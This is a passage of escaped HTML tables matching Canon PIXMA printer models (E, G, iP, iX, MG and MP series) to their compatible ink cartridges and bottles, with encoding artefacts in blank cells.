width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td 